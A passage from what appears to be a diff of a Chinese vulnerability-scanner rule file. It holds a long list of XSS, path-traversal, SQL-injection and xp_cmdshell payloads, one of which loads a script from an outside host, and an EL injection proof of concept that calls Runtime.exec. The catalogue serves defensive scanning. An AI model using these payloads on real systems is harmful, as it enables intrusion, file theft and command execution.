sJvxK9VFQDGzjVF7d9+9z1ARJIHyMxRQNo2SDn2408HBsY5njZJPcFbTomJo59H5HIAUmIDpPQXVGS0igfg7detBqptv/0ulwfIbbQB8kchVtNmiQsQUO7Qru37jpQX7WmS/6YZPXP+LPprbVgC0ul0Op1Op9Pp/gYrAa7fWhG7QQAAAABJRU5ErkJggg==);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// \n> \n[text](http://danlec.com \" [@danlec](/danlec) \") \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](javascript:this;alert(1)) \n[a](Javascript:alert(1)) \n[a](Javas%26%2399;ript:alert(1)) \n[a](javascript:alert￾(1)) \n[a](javascript:confirm(1) \n[a](javascript://www.google.com%0Aprompt(1)) \n[a](javascript://%0d%0aconfirm(1);com) \n[a](javascript:window.onerror=confirm;throw%201) \n[a]([\u4e3a\u4e86\u641c\u7d22\u6210\u529f\uff0c\u8fd9\u91cc\u4e3a0x01\u4e0d\u53ef\u89c1\u5b57\u7b26\uff0c\u4e0d\u5305\u62ec\u4e2d\u62ec\u53f7]javascript:alert(document.domain)) \n<\\h1\\>confirm(2)\n'> \n='> \n \n \n%3Cscript%3Ealert('XSS')%3C/script%3E \n \n \n%0a%0a.jsp \n%22%3cscript%3ealert(%22xss%22)%3c/script%3e \n%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd \n%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini \n%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e \n%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e \n%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html \n%3f.jsp \n%3f.jsp \n \n \n?sql_debug=1 \na%5c.aspx \na.jsp/ \na/ \na? \n\"> \n';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt'--&& \n%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \n%3Cscript%3Ealert(document. domain);%3C/script%3E& \n%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= \n1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= \nhttp://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd \n..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini \n\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini \n'';!--\"=&{()} \n \n \n \n \n \n \n \n \n \n \n\"\";' > out \n \n \n \n \n \n \n \n
\n \n \n \n \n \n \n \n \n \n
\n
\n
\n \n \n \n \n \n \ngetURL(\"javascript:alert('XSS')\") \na=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert('XSS');\";eval(a+b+c+d); \n \n\"> <\" \n \n \n \n \n \n \n \nPT src=\"http://xss.ha.ckers.org/a.js\"> \nlink\n\n\";alert(1);//xx \n \n \n\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be //US-ASCII\u7f16\u7801\uff0c\u5982Tomcat \n \n \n \n \n \n \n \n \naaaa \naaaa \nXSS \nXSS \n \n \n //\u65e0\u9700js\u6807\u7b7e\uff0c\u53ef\u76f4\u63a5\u6267\u884c \n //IE7\u4ee5\u4e0b \n \n \n
//IE7\u4ee5\u4e0b \n
\n \n \n //Firefox/Chrome \n \n \n \n //Firefox/Chrome/Safari \n \n \n \n'\"> //IE \n //IE \n \n \n \nal \n// \u4e0b\u9762\u7684img\u6807\u7b7e\u90fd\u662f\u5728IE7\u4ee5\u4e0b\u7248\u672c\u751f\u6548 \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n //IE7\u4ee5\u4e0b \n \n \n //IE7\u4ee5\u4e0b \n \n \n //Firefox \n \n \n \n \nalalertert(1) \n \n \n \n \n \n \n[quote]\">'> \n<[/quote] \n \n \n
  • XSS
    //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n //IE7\u4ee5\u4e0b \n \n \n \n \n \n
//IE7\u4ee5\u4e0b \n
//IE7\u4ee5\u4e0b \n
//IE7\u4ee5\u4e0b", - "vul_name": "1", - "vul_name_en": null, - "vul_name_zh": "1", - "vul_type": "1" - }, { "level": 1, "state": "enable", "system_type": 0, "user": 1, - "vul_desc": "1", + "vul_desc": "CWE-917\uff0c\u8be5\u8f6f\u4ef6\u4f7f\u7528\u6765\u81ea\u4e0a\u6e38\u7ec4\u4ef6\u7684\u5916\u90e8\u5f71\u54cd\u7684\u8f93\u5165\u6765\u6784\u9020Java Server Page\uff08JSP\uff09\u4e2d\u7684\u5168\u90e8\u6216\u90e8\u5206\u8868\u8fbe\u8bed\u8a00\uff08EL\uff09\u8bed\u53e5\uff0c\u4f46\u4e0d\u4f1a\u4e2d\u548c\u6216\u9519\u8bef\u5730\u4e2d\u548c\u4e86\u53ef\u4ee5\u4fee\u6539\u9884\u671f\u7684EL\u8bed\u53e5\u7684\u7279\u6b8a\u5143\u7d20\u3002\u5b83\u88ab\u6267\u884c\u3002\n\nEL\uff08Expression Language\uff09 \u662f\u4e3a\u4e86\u4f7fJSP\u5199\u8d77\u6765\u66f4\u52a0\u7b80\u5355\u3002\u8868\u8fbe\u5f0f\u8bed\u8a00\u7684\u7075\u611f\u6765\u81ea\u4e8e ECMAScript \u548c XPath \u8868\u8fbe\u5f0f\u8bed\u8a00\uff0c\u5b83\u63d0\u4f9b\u4e86\u5728 JSP \u4e2d\u7b80\u5316\u8868\u8fbe\u5f0f\u7684\u65b9\u6cd5\uff0c\u8ba9Jsp\u7684\u4ee3\u7801\u66f4\u52a0\u7b80\u5316\u3002\n\nEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\u548cSpEL\u3001OGNL\u7b49\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\u662f\u4e00\u6837\u7684\u6f0f\u6d1e\u539f\u7406\u7684\uff0c\u5373\u8868\u8fbe\u5f0f\u5916\u90e8\u53ef\u63a7\u5bfc\u81f4\u653b\u51fb\u8005\u6ce8\u5165\u6076\u610f\u8868\u8fbe\u5f0f\u5b9e\u73b0\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\n\n\u4e00\u822c\u6765\u8bf4\uff0cEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\u7684\u5916\u90e8\u53ef\u63a7\u70b9\u5165\u53e3\u90fd\u662f\u5728Java\u7a0b\u5e8f\u4ee3\u7801\u4e2d\uff0c\u5373Java\u7a0b\u5e8f\u4e2d\u7684EL\u8868\u8fbe\u5f0f\u5185\u5bb9\u5168\u90e8\u6216\u90e8\u5206\u662f\u4ece\u5916\u90e8\u83b7\u53d6\u7684\u3002\n\n**\u901a\u7528POC**\n\n```Java\n//\u5bf9\u5e94\u4e8eJSP\u9875\u9762\u4e2d\u7684pageContext\u5bf9\u8c61\uff08\u6ce8\u610f\uff1a\u53d6\u7684\u662fpageContext\u5bf9\u8c61\uff09\n${pageContext}\n\n//\u83b7\u53d6Web\u8def\u5f84\n${pageContext.getSession().getServletContext().getClassLoader().getResource(\"\")}\n\n//\u6587\u4ef6\u5934\u53c2\u6570\n${header}\n\n//\u83b7\u53d6webRoot\n${applicationScope}\n\n//\u6267\u884c\u547d\u4ee4\n${pageContext.request.getSession().setAttribute(\"a\",pageContext.request.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"calc\").getInputStream())}\n```", "vul_desc_en": null, - "vul_desc_zh": "1", - "vul_fix": "", + "vul_desc_zh": "CWE-917\uff0c\u8be5\u8f6f\u4ef6\u4f7f\u7528\u6765\u81ea\u4e0a\u6e38\u7ec4\u4ef6\u7684\u5916\u90e8\u5f71\u54cd\u7684\u8f93\u5165\u6765\u6784\u9020Java Server Page\uff08JSP\uff09\u4e2d\u7684\u5168\u90e8\u6216\u90e8\u5206\u8868\u8fbe\u8bed\u8a00\uff08EL\uff09\u8bed\u53e5\uff0c\u4f46\u4e0d\u4f1a\u4e2d\u548c\u6216\u9519\u8bef\u5730\u4e2d\u548c\u4e86\u53ef\u4ee5\u4fee\u6539\u9884\u671f\u7684EL\u8bed\u53e5\u7684\u7279\u6b8a\u5143\u7d20\u3002\u5b83\u88ab\u6267\u884c\u3002\n\nEL\uff08Expression Language\uff09 \u662f\u4e3a\u4e86\u4f7fJSP\u5199\u8d77\u6765\u66f4\u52a0\u7b80\u5355\u3002\u8868\u8fbe\u5f0f\u8bed\u8a00\u7684\u7075\u611f\u6765\u81ea\u4e8e ECMAScript \u548c XPath \u8868\u8fbe\u5f0f\u8bed\u8a00\uff0c\u5b83\u63d0\u4f9b\u4e86\u5728 JSP \u4e2d\u7b80\u5316\u8868\u8fbe\u5f0f\u7684\u65b9\u6cd5\uff0c\u8ba9Jsp\u7684\u4ee3\u7801\u66f4\u52a0\u7b80\u5316\u3002\n\nEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\u548cSpEL\u3001OGNL\u7b49\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\u662f\u4e00\u6837\u7684\u6f0f\u6d1e\u539f\u7406\u7684\uff0c\u5373\u8868\u8fbe\u5f0f\u5916\u90e8\u53ef\u63a7\u5bfc\u81f4\u653b\u51fb\u8005\u6ce8\u5165\u6076\u610f\u8868\u8fbe\u5f0f\u5b9e\u73b0\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\n\n\u4e00\u822c\u6765\u8bf4\uff0cEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\u7684\u5916\u90e8\u53ef\u63a7\u70b9\u5165\u53e3\u90fd\u662f\u5728Java\u7a0b\u5e8f\u4ee3\u7801\u4e2d\uff0c\u5373Java\u7a0b\u5e8f\u4e2d\u7684EL\u8868\u8fbe\u5f0f\u5185\u5bb9\u5168\u90e8\u6216\u90e8\u5206\u662f\u4ece\u5916\u90e8\u83b7\u53d6\u7684\u3002\n\n**\u901a\u7528POC**\n\n```Java\n//\u5bf9\u5e94\u4e8eJSP\u9875\u9762\u4e2d\u7684pageContext\u5bf9\u8c61\uff08\u6ce8\u610f\uff1a\u53d6\u7684\u662fpageContext\u5bf9\u8c61\uff09\n${pageContext}\n\n//\u83b7\u53d6Web\u8def\u5f84\n${pageContext.getSession().getServletContext().getClassLoader().getResource(\"\")}\n\n//\u6587\u4ef6\u5934\u53c2\u6570\n${header}\n\n//\u83b7\u53d6webRoot\n${applicationScope}\n\n//\u6267\u884c\u547d\u4ee4\n${pageContext.request.getSession().setAttribute(\"a\",pageContext.request.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"calc\").getInputStream())}\n```", + "vul_fix": "1", "vul_fix_en": null, - "vul_fix_zh": "", - "vul_name": "123", + "vul_fix_zh": "1", + "vul_name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", "vul_name_en": null, - "vul_name_zh": "123", - "vul_type": "123" - }, - { - "level": 1, - "state": "disable", - "system_type": 0, - "user": 1, - "vul_desc": "\n1\u3001\u4fee\u6539\u670d\u52a1\u7aef\u7a0b\u5e8f\uff0c\u7ed9HTTP\u54cd\u5e94\u5934\u52a0\u4e0aStrict-Transport-Security \u5982\u679c\u662fjava \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nresponse.setHeader(\"Strict-Transport-Security\"\uff0c\"value\")\n\u5982\u679c\u662fphp \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nheader('Strict-Transport-Security:value')\n\u5982\u679c\u662fasp\u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0 HTTP\u54cd\u5e94\u5934\n\nResponse.AddHeader \"Strict-Transport-Security\",\"value\"\n\u5982\u679c\u662fpython django \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nresponse=HttpResponse() \nresponse['Strict-Transport-Security']=\"value\u201d\n\u5982\u679c\u662fpython flask\u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0 HTTP\u54cd\u5e94\u5934\n\nresponse=make_ response()\nresponse.headers[\"Strict-Transport-Security\"]=\"value\";\n2\u3001\u4fee\u6539\u8d1f\u8f7d\u5747\u8861\u6216\u53cd\u5411\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u7ed9HTTP\u54cd\u5e94\u5934\u52a0\u4e0aStrict-Transport-Security;\n\n\u5982\u679c\u4f7f\u7528Nginx\u3001Tengine\u3001Open resty \u7b49\u4f5c\u4e3a\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5728\u914d\u7f6e\u6587\u4ef6\u4e2d\u5199\u5165\u5982\u4e0b\u5185\u5bb9\u5373\u53ef\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\uff1b\n\nadd_header Strict-Transport-Security value\uff1b\n\u5982\u679c\u4f7f\u7528Apache\u4f5c\u4e3a\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5728\u914d\u7f6e\u6587\u4ef6\u4e2d\u5199\u5165\u5982\u4e0b\u5185\u5bb9\u5373\u53ef\u6dfb\u52a0HTTP\u554a\u5e94\u5934\uff1a\n\nHeader add Strict-Transport-Security\"value\"\u3002", - "vul_desc_en": null, - "vul_desc_zh": "\n1\u3001\u4fee\u6539\u670d\u52a1\u7aef\u7a0b\u5e8f\uff0c\u7ed9HTTP\u54cd\u5e94\u5934\u52a0\u4e0aStrict-Transport-Security \u5982\u679c\u662fjava \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nresponse.setHeader(\"Strict-Transport-Security\"\uff0c\"value\")\n\u5982\u679c\u662fphp \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nheader('Strict-Transport-Security:value')\n\u5982\u679c\u662fasp\u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0 HTTP\u54cd\u5e94\u5934\n\nResponse.AddHeader \"Strict-Transport-Security\",\"value\"\n\u5982\u679c\u662fpython django \u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\n\nresponse=HttpResponse() \nresponse['Strict-Transport-Security']=\"value\u201d\n\u5982\u679c\u662fpython flask\u670d\u52a1\u7aef\uff0c\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u65b9\u5f0f\u6dfb\u52a0 HTTP\u54cd\u5e94\u5934\n\nresponse=make_ response()\nresponse.headers[\"Strict-Transport-Security\"]=\"value\";\n2\u3001\u4fee\u6539\u8d1f\u8f7d\u5747\u8861\u6216\u53cd\u5411\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u7ed9HTTP\u54cd\u5e94\u5934\u52a0\u4e0aStrict-Transport-Security;\n\n\u5982\u679c\u4f7f\u7528Nginx\u3001Tengine\u3001Open resty \u7b49\u4f5c\u4e3a\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5728\u914d\u7f6e\u6587\u4ef6\u4e2d\u5199\u5165\u5982\u4e0b\u5185\u5bb9\u5373\u53ef\u6dfb\u52a0HTTP\u54cd\u5e94\u5934\uff1b\n\nadd_header Strict-Transport-Security value\uff1b\n\u5982\u679c\u4f7f\u7528Apache\u4f5c\u4e3a\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5728\u914d\u7f6e\u6587\u4ef6\u4e2d\u5199\u5165\u5982\u4e0b\u5185\u5bb9\u5373\u53ef\u6dfb\u52a0HTTP\u554a\u5e94\u5934\uff1a\n\nHeader add Strict-Transport-Security\"value\"\u3002", - "vul_fix": "fgf", - "vul_fix_en": null, - "vul_fix_zh": "fgf", - "vul_name": "3", - "vul_name_en": null, - "vul_name_zh": "3", - "vul_type": "3" + "vul_name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "vul_type": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" }, { "level": 3, @@ -63,22 +31,6 @@ "vul_name_zh": "\u6587\u4ef6\u5199\u5165", "vul_type": "FileWrite" }, - { - "level": 5, - "state": "enable", - "system_type": 1, - "user": 1, - "vul_desc": "IP\u5730\u5740\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u8ba1\u7b97\u673a\u6216\u8bbe\u5907\u7684IP\u5730\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u6cc4\u9732\u548c\u7f51\u7edc\u5b89\u5168\u98ce\u9669\u3002\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6cc4\u9732\u7684IP\u5730\u5740\u6765\u8ffd\u8e2a\u7528\u6237\u7684\u5728\u7ebf\u6d3b\u52a8\u3001\u8fdb\u884c\u7f51\u7edc\u5165\u4fb5\u3001\u53d1\u8d77\u5206\u5e03\u5f0f\u62d2\u7edd\u670d\u52a1\uff08DDoS\uff09\u653b\u51fb\u7b49\u6076\u610f\u884c\u4e3a\uff0c\u5bf9\u4e2a\u4eba\u548c\u7ec4\u7ec7\u7684\u7f51\u7edc\u5b89\u5168\u6784\u6210\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4IP\u5730\u5740\u7684\u9690\u79c1\u548c\u5b89\u5168\u81f3\u5173\u91cd\u8981\u3002", - "vul_desc_en": null, - "vul_desc_zh": "IP\u5730\u5740\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684\u8ba1\u7b97\u673a\u6216\u8bbe\u5907\u7684IP\u5730\u5740\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u53ef\u80fd\u5bfc\u81f4\u9690\u79c1\u6cc4\u9732\u548c\u7f51\u7edc\u5b89\u5168\u98ce\u9669\u3002\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6cc4\u9732\u7684IP\u5730\u5740\u6765\u8ffd\u8e2a\u7528\u6237\u7684\u5728\u7ebf\u6d3b\u52a8\u3001\u8fdb\u884c\u7f51\u7edc\u5165\u4fb5\u3001\u53d1\u8d77\u5206\u5e03\u5f0f\u62d2\u7edd\u670d\u52a1\uff08DDoS\uff09\u653b\u51fb\u7b49\u6076\u610f\u884c\u4e3a\uff0c\u5bf9\u4e2a\u4eba\u548c\u7ec4\u7ec7\u7684\u7f51\u7edc\u5b89\u5168\u6784\u6210\u5a01\u80c1\u3002\u56e0\u6b64\uff0c\u4fdd\u62a4IP\u5730\u5740\u7684\u9690\u79c1\u548c\u5b89\u5168\u81f3\u5173\u91cd\u8981\u3002", - "vul_fix": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_fix_en": null, - "vul_fix_zh": "\u52a0\u5f3a\u5bf9\u7528\u6237\u4e2a\u4eba\u4fe1\u606f\u7684\u4fdd\u62a4\uff0c\u91c7\u53d6\u52a0\u5bc6\u3001\u8eab\u4efd\u9a8c\u8bc1\u3001\u6570\u636e\u6700\u5c0f\u5316\u7b49\u6280\u672f\u624b\u6bb5\uff0c\u786e\u4fdd\u7528\u6237\u6570\u636e\u7684\u5b89\u5168\u6027\u3002\n\u5efa\u7acb\u5b89\u5168\u6f0f\u6d1e\u62a5\u544a\u548c\u5e94\u6025\u54cd\u5e94\u673a\u5236\uff0c\u4ee5\u4fbf\u7528\u6237\u548c\u76f8\u5173\u65b9\u9762\u80fd\u591f\u53ca\u65f6\u53d1\u73b0\u548c\u5904\u7406\u5b89\u5168\u6f0f\u6d1e\u3002", - "vul_name": "IP\u5730\u5740\u6cc4\u9732", - "vul_name_en": null, - "vul_name_zh": "IP\u5730\u5740\u6cc4\u9732", - "vul_type": "IP\u5730\u5740\u6cc4\u9732" - }, { "level": 1, "state": "enable", @@ -95,6 +47,22 @@ "vul_name_zh": "JNDI\u6ce8\u5165", "vul_type": "JNDI\u6ce8\u5165" }, + { + "level": 1, + "state": "enable", + "system_type": 0, + "user": 1, + "vul_desc": "\u5168\u79f0Object Graph Navigation Library\nOGNL\u4ee3\u8868\u5bf9\u8c61\u56fe\u5bfc\u822a\u8bed\u8a00\uff1b\u5b83\u662f\u4e00\u79cd\u8868\u8fbe\u8bed\u8a00\uff0c\u7528\u4e8e\u83b7\u53d6\u548c\u8bbe\u7f6eJava\u5bf9\u8c61\u7684\u5c5e\u6027\uff0c\u4ee5\u53ca\u5176\u4ed6\u9644\u52a0\u529f\u80fd\uff0c\u4f8b\u5982\u5217\u8868\u6295\u5f71\u548c\u9009\u62e9\u4ee5\u53calambda\u8868\u8fbe\u5f0f\u3002\u60a8\u53ef\u4ee5\u4f7f\u7528\u76f8\u540c\u7684\u8868\u8fbe\u5f0f\u6765\u83b7\u53d6\u548c\u8bbe\u7f6e\u5c5e\u6027\u503c\u3002", + "vul_desc_en": null, + "vul_desc_zh": "\u5168\u79f0Object Graph Navigation Library\nOGNL\u4ee3\u8868\u5bf9\u8c61\u56fe\u5bfc\u822a\u8bed\u8a00\uff1b\u5b83\u662f\u4e00\u79cd\u8868\u8fbe\u8bed\u8a00\uff0c\u7528\u4e8e\u83b7\u53d6\u548c\u8bbe\u7f6eJava\u5bf9\u8c61\u7684\u5c5e\u6027\uff0c\u4ee5\u53ca\u5176\u4ed6\u9644\u52a0\u529f\u80fd\uff0c\u4f8b\u5982\u5217\u8868\u6295\u5f71\u548c\u9009\u62e9\u4ee5\u53calambda\u8868\u8fbe\u5f0f\u3002\u60a8\u53ef\u4ee5\u4f7f\u7528\u76f8\u540c\u7684\u8868\u8fbe\u5f0f\u6765\u83b7\u53d6\u548c\u8bbe\u7f6e\u5c5e\u6027\u503c\u3002", + "vul_fix": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "vul_fix_en": null, + "vul_fix_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "vul_name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "vul_name_en": null, + "vul_name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "vul_type": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, { "level": 5, "state": "enable", @@ -178,18 +146,34 @@ { "level": 1, "state": "enable", - "system_type": 1, + "system_type": 0, "user": 1, - "vul_desc": "Visa\u5361\u4fe1\u606f\u6cc4\u9732\u662f\u6307\u4e2a\u4eba\u6216\u7ec4\u7ec7\u7684Visa\u4fe1\u7528\u5361\u6216\u501f\u8bb0\u5361\u53f7\u7801\u4ee5\u53ca\u76f8\u5173\u654f\u611f\u652f\u4ed8\u4fe1\u606f\u5728\u672a\u7ecf\u6388\u6743\u7684\u60c5\u51b5\u4e0b\u88ab\u516c\u5f00\u6216\u6cc4\u9732\u7ed9\u7b2c\u4e09\u65b9\uff0c\u4ece\u800c\u5bfc\u81f4\u4e2a\u4eba\u91d1\u878d\u9690\u79c1\u53d7\u5230\u5a01\u80c1\u7684\u4e00\u79cd\u4e25\u91cd\u6f0f\u6d1e\u3002\n\u4e00\u65e6Visa\u5361\u4fe1\u606f\u88ab\u6cc4\u9732\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u5229\u7528\u8fd9\u4e9b\u4fe1\u606f\u8fdb\u884c\u5404\u79cd\u6076\u610f\u6d3b\u52a8\uff0c\u5305\u62ec\u975e\u6cd5\u8d2d\u7269\u3001\u91d1\u878d\u8bc8\u9a97\u3001\u8eab\u4efd\u76d7\u7a83\u4ee5\u53ca\u975e\u6cd5\u8f6c\u8d26\u3002\u4f8b\u5982\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4f7f\u7528\u88ab\u6cc4\u9732\u7684\u5361\u53f7\u8fdb\u884c\u5728\u7ebf\u8d2d\u7269\u6216\u5b9e\u9645\u8d2d\u4e70\u5546\u54c1\u548c\u670d\u52a1\uff0c\u4ece\u800c\u5bfc\u81f4\u5361\u4e3b\u8d26\u6237\u8d44\u91d1\u88ab\u76d7\u6216\u8005\u6b20\u6b3e\u589e\u52a0\u3002\u6b64\u5916\uff0cVisa\u5361\u4fe1\u606f\u7684\u6cc4\u9732\u8fd8\u53ef\u80fd\u5bfc\u81f4\u4fe1\u7528\u8bc4\u5206\u4e0b\u964d\uff0c\u5bf9\u5361\u4e3b\u7684\u4fe1\u7528\u8bb0\u5f55\u4ea7\u751f\u8d1f\u9762\u5f71\u54cd\u3002\n\u4e3a\u4e86\u4fdd\u62a4Visa\u5361\u4fe1\u606f\u7684\u5b89\u5168\uff0c\u5361\u4e3b\u5e94\u5f53\u91c7\u53d6\u4e00\u7cfb\u5217\u9884\u9632\u63aa\u65bd\uff0c\u5305\u62ec\u5b9a\u671f\u68c0\u67e5\u8d26\u5355\uff0c\u8bbe\u7f6e\u5f3a\u5bc6\u7801\u548cPIN\u7801\uff0c\u4e0d\u968f\u610f\u5206\u4eab\u5361\u53f7\u7b49\u654f\u611f\u4fe1\u606f\uff0c\u4ee5\u53ca\u5728\u4f7f\u7528\u5361\u65f6\u4fdd\u6301\u8b66\u60d5\u3002\u540c\u65f6\uff0c\u91d1\u878d\u673a\u6784\u548c\u652f\u4ed8\u670d\u52a1\u63d0\u4f9b\u5546\u4e5f\u5e94\u52a0\u5f3a\u5b89\u5168\u63aa\u65bd\uff0c\u76d1\u6d4b\u4e0d\u6b63\u5e38\u7684\u4ea4\u6613\u6d3b\u52a8\uff0c\u4ee5\u53ca\u63d0\u4f9b\u5361\u4e3b\u4fdd\u62a4\u5176\u8d26\u6237\u514d\u53d7\u4e0d\u5f53\u4f7f\u7528\u7684\u624b\u6bb5\u3002\n\u5bf9\u4e8eVisa\u5361\u4fe1\u606f\u7684\u4e0d\u5f53\u6cc4\u9732\uff0c\u76f8\u5173\u6cd5\u5f8b\u6cd5\u89c4\u5e94\u8be5\u52a0\u4ee5\u7ea6\u675f\u548c\u60e9\u7f5a\uff0c\u4ee5\u7ef4\u62a4\u91d1\u878d\u9690\u79c1\u548c\u91d1\u878d\u7cfb\u7edf\u7684\u5b89\u5168\u6027\u3002\u8fd9\u6837\u53ef\u4ee5\u5e2e\u52a9\u51cf\u5c11Visa\u5361\u4fe1\u606f\u6cc4\u9732\u5bf9\u4e2a\u4eba\u548c\u793e\u4f1a\u7684\u6f5c\u5728\u98ce\u9669\u3002", + "vul_desc": "Spring Expression Language\uff08\u7b80\u79f0SpEL\uff09\u662f\u4e00\u79cd\u5f3a\u5927\u7684\u8868\u8fbe\u5f0f\u8bed\u8a00\uff0c\u652f\u6301\u5728\u8fd0\u884c\u65f6\u67e5\u8be2\u548c\u64cd\u4f5c\u5bf9\u8c61\u56fe\u3002\u8bed\u8a00\u8bed\u6cd5\u7c7b\u4f3c\u4e8eUnified EL\uff0c\u4f46\u63d0\u4f9b\u4e86\u989d\u5916\u7684\u529f\u80fd\uff0c\u7279\u522b\u662f\u65b9\u6cd5\u8c03\u7528\u548c\u57fa\u672c\u7684\u5b57\u7b26\u4e32\u6a21\u677f\u529f\u80fd\u3002\u540c\u65f6\u56e0\u4e3aSpEL\u662f\u4ee5API\u63a5\u53e3\u7684\u5f62\u5f0f\u521b\u5efa\u7684\uff0c\u6240\u4ee5\u5141\u8bb8\u5c06\u5176\u96c6\u6210\u5230\u5176\u4ed6\u5e94\u7528\u7a0b\u5e8f\u548c\u6846\u67b6\u4e2d\u3002\n", "vul_desc_en": null, - "vul_desc_zh": 